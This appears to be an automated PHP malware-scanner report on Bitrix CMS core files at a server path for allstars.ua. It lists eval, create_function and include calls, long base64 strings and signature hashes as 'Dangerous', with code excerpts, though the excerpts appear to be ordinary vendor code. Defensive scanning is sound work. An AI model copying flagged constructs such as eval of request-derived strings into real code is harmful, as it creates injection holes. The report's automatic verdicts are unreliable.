/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/database.php Size: 33.13 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 4
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/component.php Size: 39.86 kB Created: 2018-01-19 19:02:20 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/grids.php Size: 16.11 kB Created: 2018-01-19 18:57:16 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);')); return $arThemes; } public static function GetTheme($grid_id) { $aOptions = CUserOptions::GetOption("main.interface.grid", $grid_id, array()); if($aOptions["theme"] == '') { $aGlobalOptions = CUserOptions::GetOption("main.interface", "global", array(), 0); if($aGlobalOptions["theme_template"][SITE_TEMPLATE_ID] <> '') $theme = $aGlobalOptions["theme_template"][SITE_TEMPLATE_ID]; else $theme = ""; } else { $theme = $aOptions["th...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/zip.php Size: 66.90 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$res = '.$arParams['callback_pre_add'].'(\'callback_pre_add\', $arLocalHeader);'); if ($res == 0) { $arHeader['status'] = "skipped"; $res = 1; } if ($arHeader['stored_filename'] != $arLocalHeader['stored_filename']) { $arHeader['stored_filename'] = $this->_reducePath($arLocalHeader['stored_filename']); } } if ($arHeader['stored_filename'] == "") { $arHeader['status'] = "filtered"; } if (strlen($arHeader['stored_filename']) > 0xFF) { $arHeader['status'] = 'filename_too_long'; } if ($arHeade...
| Sign 963e968a Line: 2571 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_class.php Size: 140.73 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit execution Line: 3798 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")
| Exploit silenced_eval Line: 3274 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\"),(\$order=\"\"),array(\"ACTIVE\"=>\"Y\"));\$cnt=0;while(\$ar_"."res=\$path->Fe"."tch())\$cnt++;"); return $cnt;} } public static function GetModuleVersion($module) { if (strlen($module)<=0) return false; $strModule_tmp_dir = $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module; if (file_exists($strModule_tmp_dir) && is_dir($strModule_tmp_dir)) { if ($module != "main") { if (file_exists($strModule_tmp_dir."/install/index.php")) { $arModule_...
| Sign 696317c4 Line: 3274 Dangerous Malware Signature (hash: 696317c4) |
@eval("\
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_client_partner.php Size: 75.03 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/component_template.php Size: 30.34 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/menu.php Size: 15.46 kB Created: 2018-01-19 18:46:29 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) $bSkipMenuItem = true; } if(!$bSkipMenuItem) $ITEM_INDEX++; if(($pos = strpos($LINK, "?"))!==false) $ITEM_TYPE = "U"; elseif(substr($LINK, -1)=="/") $ITEM_TYPE = "D"; else $ITEM_TYPE = "P"; $SELECTED = false; if($bCached) { $all_links = $arMenuCache[$iMenuItem]["LINKS"]; if(!is_array($all_links)) $all_links = array(); } else { $all_links = array(); if(is_array($ADDITIONAL_LINKS)) { foreach($ADDITIONAL_LINKS as $link) { $tested_link = trim(Rel2Abs($this->MenuDir, ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/user.php Size: 139.50 kB Created: 2018-01-19 19:03:44 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_b24.php Size: 9.88 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog(LOG_INFO, $_SERVER["HTTP_HOST"]."\tstart\t".$moduleId.$arUpdaters[$i1][0]); CUpdateClient::RunUpdaterScript($this->updatersDir.$moduleId.$arUpdaters[$i1][0], $errorMessageTmp, "", $moduleId); syslog(LOG_INFO, $_SERVER["HTTP_HOST"]."\tend\t".$moduleId.$arUpdaters[$i1][0]."\t".$errorMessageTmp); if (strlen($errorMessageTmp) > 0) $errorMessage .= str_replace("#MODULE#", $moduleId, str_replace("#VER#", $arUpdaters[$i1][1], GetMessage("SUPP_UK_UPDN_ERR"))).": ".$errorMessageTmp."."; $this->Col...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/wizard_site.php Size: 40.55 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); if (array_key_exists("GROUPS", $arWizardTemplates) && is_array($arWizardTemplates["GROUPS"])) $this->arTemplateGroups = $arWizardTemplates["GROUPS"]; } function __GetInstallationScript() { $instScript = $_SERVER["DOCUMENT_ROOT"].$this->path."/wizard.php"; if (!is_file($instScript)) return false; $this->pathToScript = $instScript; return true; } function __GetServices() { $serviceFile = $_SERVER["DOCUMENT_ROOT"].$this->path."/....
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/component_util.php Size: 63.40 kB Created: 2022-12-12 15:45:41 Modified: 2023-11-27 14:53:26 Dangers: 6
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/vuln_scanner.php Size: 63.50 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Dangers: 1
| Description | Match |
|---|
Sign f9dc0a55 Line: 1938 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_list.php Size: 1.21 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("parent."+this.name+"_"+str);
}
catch(e){}
}
</script>
</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="white">
<table width="100%" border="0" id="updates_items">
</table>
</body>
</html>
<? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/controller_member.php Size: 41.85 kB Created: 2018-01-19 19:02:17 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 1076 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode($_REQUEST['parameters'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($disconnect_command); COption::SetOptionString("main", "controller_member", "N"); } public static function GetBackup($bRefresh = false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh) $arCachedData = unserialize(COption::GetOptionString("main", "~controller_backup", "")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main", "~controller_backup", serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_client.php Size: 250.21 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 2 Dangers: 14
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'X1VwZGF0ZVN5c3RlbScpLCAwLCAxMDI0KTsKICAgICAgICAgICAgICAgICAgICBteV9yZXN1bHQ6PWRibXNfbG9jay5yZXF1ZXN0KG15X2xvY2tfaWQsIGRibXNfbG9jay54X21vZGUsIDAsIHRydWUpOwogICAgICAgICAgICAgICAgICAgIC0tICBSZXR1cm4gdmFsdWU6CiAgICAgICAgICAgICAgICAgICAgLS0gICAgMCAtIHN1Y2Nlc3MKICAgICAgICAgICAgICAgICAgICAtLSAgICAxIC0gdGltZW91dAogICAgICAgICAgICAgICAgICAgIC0tICAgIDIgLSBkZWFkbG9jawogICAgICAgICAgICAgICAgICAgIC0tICAgIDMgLSBwYXJhbWV0ZXIgZXJyb3IKICAgICAgICAgICAgICAgICAgICAtLSAgICA0IC0gYWxyZWFkeSBvd24gbG9jayBzcGVjaWZpZWQgYnk...
| Exploit execution Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER[___708070088(2217)
| Exploit silenced_eval Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($GLOBALS['____2118741149'][1005](array('<?php', '<?', '?>')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($_1468909282["#"]["cdata-section"][(1104/2-552)]["#"]);} catch(Exception $_691450541){ $_336334048= ___708070088(38).$_691450541->getCode().___708070088(39).$_691450541->getMessage();} $_1079794711 .= ___708070088(40).$GLOBALS['____2118741149'][24]($_1468909282[___708070088(41)][___708070088(42)]).___708070088(43).$GLOBALS['____2118741149'][25]($_336334048);}} if(empty($_1629220684)){ CUpdateClient::AddMessage2Log($GLOBALS['____2118741149'][26](___708070088(44), ___708070088(45), $_10797947...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) |
N5c3Rlb
| Sign 7f5d33bf Line: 1 Dangerous Malware Signature (hash: 7f5d33bf) |
JlcGxhY2
| Sign 91535293 Line: 1 Dangerous Malware Signature (hash: 91535293) |
luY2x1ZG
| Sign 963e968a Line: 1 Dangerous Malware Signature (hash: 963e968a) |
pbmNsdWRl
| Sign 99fc3b9d Line: 1 Dangerous Malware Signature (hash: 99fc3b9d) |
$GLOBALS['____
| Sign a408f408 Line: 1 Dangerous Malware Signature (hash: a408f408) |
c3RyX
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) |
Y29we
| Sign d30fc49e Line: 1 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) |
ZXhlYy
| Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454) |
vcGVu
| Sign ee1cb326 Line: 1 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_log.php Size: 4.71 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a['.$sort.'], $b['.$sort.'])*('.$ord.');')); } $rsData = new CAdminResult(null, $sTableID); $rsData->InitFromArray($arLogRecs); $rsData->NavStart(); $lAdmin->NavText($rsData->GetNavPrint(GetMessage("update_log_nav"))); $n = 0; while($rec = $rsData->Fetch()) { $row = &$lAdmin->AddRow(0, null); $aDate = explode(" ", htmlspecialcharsbx($rec[1])); $row->AddField("DATE", '<span style="white-space:nowrap">'.$aDate[0].'</span> '.$aDate[1]); $row->AddField("DESC...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/main.php Size: 179.28 kB Created: 2022-09-19 12:42:18 Modified: 2023-11-27 14:53:26 Warns: 4 Dangers: 8
| Description | Match |
|---|
Exploit double_var2 Line: 220 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
| Exploit execution Line: 1326 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"] . $path)
| Exploit execution Line: 204 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/include/prolog_admin_after.php")
| Exploit execution Line: 206 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/include/epilog_admin.php")
| Exploit execution Line: 274 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/include/prolog" . $isAdmin . "_after.php")
| Exploit execution Line: 288 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/interface/auth/wrapper.php")
| Exploit execution Line: 297 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/include/epilog" . $isAdmin . ".php")
| Exploit silenced_eval Line: 4175 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("return " . $strCondition . ";")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a[1] == $b[1]) return 0; return ($a[1] < $b[1])? -1 : 1;')); $res = array(); foreach ($this->__view[$view] as $item) $res[] = $item[0]; return implode($res); } public static function OnChangeFileComponent($path, $site) { global $APPLICATION; if (!HasScriptExtension($path)) return; $docRoot = CSite::GetSiteDocRoot($site); CUrlRewriter::Delete( array("SITE_ID" => $site, "PATH" => $path, "ID" => "NULL") ); if (class_exists("\\Bitrix\\Main\\Application", false)) { \Bit...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("?>" . $fTmp->GetContents()); } $FILE_PERM = $PERM[$path_file]; if (!is_array($FILE_PERM)) $FILE_PERM = array(); if (!$bOverWrite && count($FILE_PERM) > 0) return true; $bDiff = false; $str = "<?\n"; foreach ($arPermissions as $group => $perm) { if (strlen($perm) > 0) $str .= "\$PERM[\"" . EscapePHPString($path_file) . "\"][\"" . EscapePHPString($group) . "\"]=\"" . EscapePHPString($perm) . "\";\n"; if (!$bDiff) { $curr_perm = $FILE_PERM[$group]; if (!isset($curr_perm) && preg_match('/^G[0-...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill(getmypid(), 9);')); define("BX_FORK_AGENTS_AND_EVENTS_FUNCTION_STARTED", true); global $DB, $CACHE_MANAGER; $CACHE_MANAGER = new CCacheManager; $DBHost = $DB->DBHost; $DBName = $DB->DBName; $DBLogin = $DB->DBLogin; $DBPassword = $DB->DBPassword; $DB = new CDatabase; $DB->Connect($DBHost, $DBName, $DBLogin, $DBPassword); $app = \Bitrix\Main\Application::getInstance(); if ($app != null) { $con = $app->getConnection(); if ($con != null) $con->connect(); } $DB->DoConnect(); $DB->StartUsin...
| Sign 11413268 Line: 1509 Dangerous Malware Signature (hash: 11413268) |
eval("?>
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/checklist.php Size: 41.67 kB Created: 2018-01-19 19:01:39 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/update_update.php Size: 89.67 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("DescrDetList_"+sModule));
wnd.document.write('</font>');
wnd.document.write('\n</body></html>');
}
//-->
</script>
<table border="0" cellspacing="1" cellpadding="2" width="99%">
<tr>
<td align="center" class="tablehead1"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DATE") ?></font></td>
<td align="center" class="tablehead2"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DESCR") ?></font></td>
<td align="center" class="tablehead3"><font class="tablehe...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/sql_util.php Size: 22.78 kB Created: 2018-01-19 18:57:16 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/general/site_checker.php Size: 87.96 kB Created: 2018-01-19 19:03:44 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 2845 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')
| Exploit execution Line: 2931 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/dbconn_error.php")
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec('catdoc -V', $output, $return_var); if ($return_var === 0) { $version = $output[0]; if (strpos($version, '0.94.4') !== false || strpos($version, '0.94.3') !== false) $strError .= GetMessage('MAIN_CATDOC_WARN', array('#VERSION#' => $version)); } } return $this->Result(false, $strError); } function check_fast_download() { $tmp = $_SERVER['DOCUMENT_ROOT'].'/bitrix/tmp/success.txt'; if (!CheckDirPath($tmp) || !file_put_contents($tmp, 'SUCCESS')) return $this->Result(false, GetMessage("MAIN_TMP_...
| Sign 471b95ee Line: 513 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
| Sign 471b95ee Line: 515 Dangerous Malware Signature (hash: 471b95ee) |
SUHOSIN
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin_tools.php Size: 23.88 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit execution Line: 180 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].$root.$init."/.description.php")
| Exploit execution Line: 232 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$path_mod."/".$file_templ."/.description.php")
| Exploit execution Line: 266 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$path."/".$folder_name."/.description.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$v1,$v2','if ($v1>$v2) return 1; elseif ($v1<$v2) return -1;')); return $arrTemplate; } } class CTemplates { public static function GetList($arFilter = array(), $arCurrentValues = array(), $template_id = array()) { if(!is_set($arFilter, "FOLDER")) { $arr = CTemplates::GetFolderList(); $arFilter["FOLDER"] = array_keys($arr); } $arTemplates = array(); foreach($arFilter["FOLDER"] as $folder) { $folder = _normalizePath($folder); $arTemplates[$folder] = array(); $arPath = array( "/bi...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/tools.php Size: 166.35 kB Created: 2018-01-19 19:03:45 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 3344 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, "Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")
| Exploit execution Line: 3744 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ua) != null)
{
rv = parseFloat(RegExp.$1);
}
}
else if (n.appName == "Netscape")
{
rv = 11;
re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
if (re.exec(ua) != null)
{
rv = parseFloat(RegExp.$1);
}
}
}
return rv;
}
})(window, document, navigator);
JS;
return '<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n", "\t"), "", $js)."</script>"; } public static function GetScrip...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/module_admin.php Size: 8.01 kB Created: 2018-01-19 19:03:45 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $fb = ($id == 'fileman' && !$USER->CanDoOperation('fileman_install_control')); if($isAdmin && !$fb && check_bitrix_sessid()) { if(strlen($_REQUEST["uninstall"])>0 || strlen($_REQUEST["install"])>0) { $id = str_replace("\\", "", str_replace("/", "", $id)); if($Module = CModule::CreateModuleObject($id)) { if($Modu...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/group_edit.php Size: 28.92 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("document.form1.USER_ID_FROM_" + id);
var ed1 = eval("document.form1.USER_ID_TO_" + id);
ed.disabled = !obj.checked;
ed1.disabled = !obj.checked;
}
</script>
<? $ind = -1; $dbUsers = CUser::GetList(($b="id"), ($o="asc"), array("ACTIVE" => "Y")); while ($arUsers = $dbUsers->Fetch()) { $ind++; ?>
<tr>
<td>
<input type="hidden" name="USER_ID_<?=$ind?>" value="<?=$arUsers["ID"] ?>">
<input type="checkbox" name="USER_ID_ACT_<?=$ind?>" id="USER_ID_ACT_ID_...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/userfield_edit.php Size: 17.60 kB Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(i);
if (r && r[1] > 0)
{
addNewRow('list_table');
}
}
});
});
//-->
</script>
<form method="POST" Action="<?echo $APPLICATION->GetCurPage()."?lang=".urlencode(LANG)?>" ENCTYPE="multipart/form-data" name="post_form">
<? $tabControl->Begin(); ?>
<? $tabControl->BeginNextTab(); ?>
<?if($ID):?>
<tr>
<td width="40%">ID:</td>
<td width="60%"><?=$ID?></td>
</tr>
<?endif?>
<tr class="adm-detail-required-field">
<td width="40%"><?=GetMessage("USERTYPE_USER_TYPE_ID")?>:</...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/restore.php Size: 162.40 kB Created: 2018-03-15 13:24:50 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit execution Line: 701 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($l); } if ($DBName && !preg_match('#^\*+$#', $DBName)) { $strWarning .= '<li>'.getMsg('DBCONN_WARN'); $create_db = false; } else { $DBHost = 'localhost'.(file_exists($_SERVER['DOCUMENT_ROOT'].'/../BitrixEnv.exe') ? ':31006' : ''); $DBLogin = 'root'; $DBPassword = ''; $DBName = 'bitrix_'.(rand(11,99)); $create_db = "Y"; } } else { $DBHost = $_REQUEST["DBHost"]; $DBLogin = $_REQUEST["DBLogin"]; $DBPassword = $_REQUEST["DBPassword"]; $DBName = $_REQUEST["DBName"]; $create_db = $_REQUEST["creat...
| Sign 7830f7a6 Line: 1755 Dangerous Malware Signature (hash: 7830f7a6) |
NvcH
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/dump_list.php Size: 15.63 kB Created: 2018-01-19 19:01:39 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(result);
PartDownload();
}
CHttpRequest.Send(url);
}
function PartDownload()
{
if (!links || links.length == 0)
return;
var link = links.pop();
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = link;
document.body.appendChild(iframe);
window.setTimeout(PartDownload, 10000);
}
function EndDump()
{
}
</script>
<div id="dump_result_div"></div>
<? $lAdmin->DisplayList(); echo BeginNote(); echo GetMessage("MAIN_DUMP_HEAD...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/settings.php Size: 11.09 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["SORT"] == $b["SORT"]) return strcasecmp($a["NAME"], $b["NAME"]); return ($a["SORT"] < $b["SORT"])? -1 : 1;')); $mid = $_REQUEST["mid"]; if($mid == "" || !isset($arModules[$mid]) || !file_exists($arModules[$mid]["PAGE"])) $mid = "main"; ob_start(); include($arModules[$mid]["PAGE"]); $strModuleSettingsTabs = ob_get_contents(); ob_end_clean(); $APPLICATION->SetTitle(GetMessage("MAIN_TITLE")); require_once ($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/pr...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/message_admin.php Size: 13.39 kB Created: 2018-01-19 18:46:29 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 66 Warning Double var technique is usually used for the obfuscation of malicious code |
${$f}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/menu.php Size: 24.77 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["sort"] == $b["sort"]) return strcasecmp($a["text"], $b["text"]); return ($a["sort"] < $b["sort"])? -1 : 1;')); } } $settingsItems[] = array( "text" => GetMessage("MAIN_MENU_MODULE_SETTINGS"), "url" => "settings.php?lang=".LANGUAGE_ID, "title" => GetMessage("MAIN_MENU_SETTINGS_ALT"), "dynamic"=>true, "module_id"=>"main", "items_id"=>"menu_module_settings", "items"=>$aModuleItems, ); } if($USER->CanDoOperation('view_other_settings') || $USER->CanDoOperation('cache...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/checklist_report.php Size: 18.84 kB Created: 2018-01-19 18:59:48 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 25 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")
| Function eval Line: 305 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
